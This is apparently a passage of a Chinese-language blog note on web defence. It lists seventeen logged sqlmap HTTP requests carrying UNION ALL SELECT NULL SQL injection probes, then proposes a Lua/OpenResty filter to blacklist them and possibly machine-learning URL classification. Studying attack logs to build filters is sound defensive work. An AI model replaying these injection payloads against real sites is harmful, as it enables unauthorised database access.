GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL-- AND ('xgNZ'='xgNZ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND ('NcqU'='NcqU HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND ('QwuM'='QwuM HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('taty'='taty HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('WMQh'='WMQh HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('xCZi'='xCZi HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('mLyg'='mLyg HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL-- AND 'uZYX'='uZYX HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL-- AND 'sNHY'='sNHY HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL-- AND 'kGUJ'='kGUJ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'LgDK'='LgDK HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'EVdv'='EVdv HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'rJml'='rJml HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'DaKV'='DaKV HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'nUAD'='nUAD HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'yeMd'='yeMd HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ttBR'='ttBR HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)

从上面的内容可以看出攻击行为有一定的规律，应该可以通过lua脚本将其识别出来直接丢到blacklist里。 在github上找到这个<https://github.com/openresty/lua-nginx-module#ngxquote_sql_str> google 论坛上：<https://groups.google.com/forum/#!topic/openresty/Jn171sBKc0k> 对于这类很好分类的url，我觉得可以利用机器学习的办法来学习bad URL，来做分类。 不过这140条数据还是有的学习借鉴的，后期再系统学一下lua吧